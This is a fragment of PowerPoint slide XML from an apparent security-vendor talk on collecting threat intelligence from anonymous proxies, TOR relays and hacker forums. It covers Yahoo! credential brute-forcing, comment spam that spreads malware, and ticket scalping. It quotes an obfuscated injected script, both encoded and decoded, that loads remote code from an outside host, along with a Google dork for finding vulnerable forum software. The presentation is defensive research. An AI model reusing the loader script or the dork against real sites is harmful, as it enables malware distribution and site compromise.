            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compare malicious traffic to benign traffic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Mostly focused on attacks we can predict</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad data-to-noise ratio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Imperva SOC and assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rely on our WAF to single out attacks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go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36643" y="1219200"/>
            <a:ext cx="2951909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813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Tap into malicious traffic</a:t>
            </a:r>
          </a:p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100% hacker guaranteed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Delicate handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anonymous Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOR Relay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To know your Enemy, you must become your Enemy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200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Misattributed to Sun Tzu – The Art of War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ngeleyesclee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7793" y="2602946"/>
            <a:ext cx="4607607" cy="2731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Participate in hacker discussions on the Web</a:t>
            </a:r>
          </a:p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Insight into “softer” evidence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Manual process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resource consuming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tap into some forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lookup specific “honey tokens” and/or                                                       known compromised information on Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find discussions around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 descr="ugly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3160" y="1828800"/>
            <a:ext cx="262128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>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What did we learn?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Hacker chit-chat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029200" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tap into the “neighborhood’s pub”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Did not follow on into IM conversations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does not require personal recommendation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analysis activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Quantitative analysis of topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Qualitative analysis of information being disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Follow up on specific interesting issues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1682" name="Picture 2" descr="http://www.theblogoflists.com/images/beer-british-pu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295400"/>
            <a:ext cx="333375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Hacker chit-chat - Quantitative analysis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Hacker chit-chat - Quantitative analysis(2)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Hacker chit-chat - Qualitative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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google Dorks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specific site vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Request for help on specific sites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6" name="Picture 6" descr="image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3257550"/>
            <a:ext cx="6343650" cy="336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Hacker chit-chat - Qualitative analysis(2)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Credit Cards &amp; Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active market place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools for cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cracking 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050" name="Picture 1" descr="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810000"/>
            <a:ext cx="27908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image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295400"/>
            <a:ext cx="327660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5" descr="image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2971800"/>
            <a:ext cx="3324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4" descr="image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2819400"/>
            <a:ext cx="63627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Hacker Chit-chat – Specific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Yahoo! Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>November 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>jobs.yahoo.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Quickly fixed by Yahoo!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rockyou.com SQL Injection &amp; Password disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>December 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User credentials were stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compromised access to Web mail accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Credit Card Disclosure from Israeli Site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anything but PCI compliant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1442" name="Picture 2" descr="http://www.faqs.org/photo-dict/photofiles/list/2353/3075injec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143000"/>
            <a:ext cx="2095500" cy="140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44" name="Picture 4" descr="http://buckeyesecure.osu.edu/pmwiki/uploads/SafeComputing/password_st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3276600"/>
            <a:ext cx="1388692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46" name="Picture 6" descr="http://blogs.southtownstar.com/money/credit-card-main_Fu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4572000"/>
            <a:ext cx="1295400" cy="115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anonymous tip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324600" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam over HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Abuse the CONNECT method to negotiate SMTP (email) protocol over a Web proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Had to block requests in order to eliminate noise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click Fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comment spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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8" descr="lg-gool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4495800"/>
            <a:ext cx="3048000" cy="1266825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59394" name="Picture 2" descr="http://rlv.zcache.com/i_gave_all_my_money_to_a_nigerian_email_scam_tshirt-p235170684305946629q6wh_4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219200"/>
            <a:ext cx="2667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6" name="Picture 4" descr="http://anhblog.net/Images/Google-Adsense/ClickFrau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743200"/>
            <a:ext cx="2552979" cy="1619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343400"/>
            <a:ext cx="2238375" cy="889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 Will get you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Cannot track back to a specific source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lots of scraping activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click Fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comment spam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7346" name="Picture 2" descr="http://public.bay.livefilestore.com/y1p79k6cDgqlbbvpwa9KtXXu6EZ9uPP42IUWlQyXIyxtKkGiUCfs1d27zsZ0zXCtRR98xblnEmOWUa8tjh4yl2K8A/yellow_onio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52600"/>
            <a:ext cx="3952161" cy="4316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 Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anonymous proxy logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real application traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many Requests, Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>detination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>isp_verify_user?l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=[username]&amp;p=[password]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://somehost/config/isp_verify_user?l=[username]&amp;p=[password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Destination hosts belong to Yahoo!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>We just had to look into this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229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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No user or password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371600"/>
            <a:ext cx="8229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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Invalid user name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829294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Yahoo!(4)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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Valid user name, invalid password</a:t>
            </a:r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usc.edu/schools/medicine/assets/img/research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1676400"/>
            <a:ext cx="3286125" cy="4000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Yahoo!(5)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An API for credential validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intended for partner applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exists on almost any Yahoo! public facing server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Completely distributed (no central monitoring)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used extensively by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute force account names (for spam purposes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute force passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers try to tunnel attacks through proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Appears in normal application traffic</a:t>
            </a:r>
          </a:p>
          <a:p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Notify Yahoo!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create signatures to detect traffic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Yahoo!(6) – Follow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found extensive lists with addresses of Yahoo! servers and tools to automatically run attacks through proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.angelfire.com/zine2/oo0_elit3_0oo/page3.html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860691"/>
            <a:ext cx="3429000" cy="309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1" descr="image0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2702808"/>
            <a:ext cx="5200650" cy="321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 SPAM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943600" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anonymous proxy logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOR relay traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple POST requests, Multiple destination hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fantasy.cgi (Anonymous Proxy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Joyful.cgi (TOR traffic)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content is consistent across many requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Promoting pornography with links to           various servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Of course we followed the link…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3010" name="Picture 2" descr="http://xenlights.com/images/SoftwareValid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295400"/>
            <a:ext cx="30480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 SPAM(2)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Following the link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Various redirects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Landing page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clicking “download”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AV worked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8" name="Picture 2" descr="image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828800"/>
            <a:ext cx="445898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image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4425" y="3505200"/>
            <a:ext cx="38385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image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800600"/>
            <a:ext cx="27717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3962400" y="2667000"/>
            <a:ext cx="609600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1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099" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="3352800"/>
            <a:ext cx="1343025" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1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100" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="3962400"/>
            <a:ext cx="1828800" cy="1252538"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1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aroundthebend.ca/images/s_spi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371600"/>
            <a:ext cx="2910755" cy="210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 spam(3)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19200"/>
            <a:ext cx="5715000" cy="44957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Comment spam used for malware distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Abusing forum management software common in Asia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Probably preceded by a Google search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Term </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>:"/joyful.cgi" –html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> yields more than 1M results</a:t>
            </a:r>
          </a:p>
          <a:p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Add correlated security rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target URL is joyful.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Potentially malicious sources (TOR relays, anonymous proxies, specific IPs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Yet more security rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Request or response contains reference to malware infected hosts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8916" name="Picture 4" descr="http://www.yates.com.au/images/au/products/pest-control/yates-ant-roach-spider-kill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733800"/>
            <a:ext cx="205740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your tickets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477000" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple requests, multiple sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From the same city (IP to Geo translation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over short period of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same ticketmaster.com URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.ticketmaster.com/event/010042A16D244B73?artistid=805980&amp;majorcatid=10004&amp;minorcatid=8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Scalping (profiteering)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid IP block mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow continuous automated operation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 descr="scalping-thum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199" y="3048000"/>
            <a:ext cx="3248579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your tickets ready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114800" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Part of a growing trend of automated business logic attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the process of devising and implementing various detection and mitigation mechanisms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4818" name="Picture 2" descr="http://www.psychologytoday.com/files/u45/rob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5450" y="1323975"/>
            <a:ext cx="3333750" cy="48482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requests of the following format:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>We followed the link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First with IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then with Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must look deeper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>View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2076450"/>
            <a:ext cx="50196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 cstate="print"/>
          <a:srcRect r="16667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4040860" y="2314575"/>
            <a:ext cx="487454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/>
          <a:srcRect r="16667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="2438400"/>
            <a:ext cx="4648200" cy="374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57575" y="3276600"/>
            <a:ext cx="5514446" cy="321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ops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page contained injected code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obfuscated script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>References yet another script from a different host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploits a Flash vulnerability to install malware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3663950" y="3213100"/>
            <a:ext cx="4708525" cy="3273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l"/>
                <a:tab pos="365125" algn="l"/>
                <a:tab pos="549275" algn="l"/>
                <a:tab pos="731838" algn="l"/>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pP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document.write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unescape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('&lt;S\103R\111PT%3E f\146=0\073 f\0456Fr(\156n%20in%20\144%6Fcu%6Den\04574) \151\146%28nn\075=%27e\164\157%75r\163\047\174\174\156\0456E%3D=\047\154og\0456F-a\0456Eim\047\051\040ff\0453D1;\040i\146(f\146%3D\0750\174|(\057\0454CIV\105|M%53N|%59A\110%4F%4F|%43LO\116ID%49%4E\105/.%74\145s\164%28\144\157cu\0456D%65nt\056re\04566er\04572er\056to%55\04570pe\162%43as\04565()%29%26\04526%66al\04573e\051)\04520d\0456Fcu%6Den\04574.\167\162i\164\145(%27&lt;\04553C%52IP\04554\040SR%43%3D%22ht\164\160:%2F\057\160%3090\0453303%2Ein%66%6F/%77.\160h\04570?%6C=\047\053e\04573c\141pe%28l\0456F\143at\151on%2E\150re\146)%2B%27\046k\075\047+e%73ca%70e(%27\04563\154on%69d%69%6Ee\047)+\047\046\04572=\047+e\04573\143a%70e(\144oc\165m%65\0456Et.\162ef\04565%72r\04565r\04529+%27\042&gt;%3C%27\053\047/S%43RI\04550%54&gt;\047);\040d\0456F%63um\145nt\0452Ew%72\04569%74e\050%27\074%27+\047%21-\055\047)\073 \074\057SC\122\111\120\04554&gt;'))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l"/>
                <a:tab pos="365125" algn="l"/>
                <a:tab pos="549275" algn="l"/>
                <a:tab pos="731838" algn="l"/>
                <a:tab pos="9144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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905000" y="4191000"/>
            <a:ext cx="4703763" cy="1371600"/>
            <a:chOff x="1905000" y="4191000"/>
            <a:chExt cx="4703763" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr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>
              <a:off x="2057400" y="4191000"/>
              <a:ext cx="4551363" cy="1371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82563" algn="l"/>
                  <a:tab pos="365125" algn="l"/>
                  <a:tab pos="549275" algn="l"/>
                  <a:tab pos="731838" algn="l"/>
                  <a:tab pos="914400" algn="l"/>
                </a:tabLst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&lt;SCRIPT&gt; ff=0; for(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nn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 in document) if(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nn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=='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etours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'||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nn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=='logo-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anim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') ff=1; if(ff==0||(/LIVE|MSN|YAHOO|LEVOFLOXACIN/.test(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document.referrer.toUpperCase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())&amp;&amp;false))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document.write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('&lt;SCRIPT SRC="http://p090303.info/w.php?l='+escape(location.href)+'&amp;k='+escape('levofloxacin')+'&amp;r='+escape(document.referrer)+'"&gt;&lt;'+'/SCRIPT&gt;');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document.write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Times New Roman" 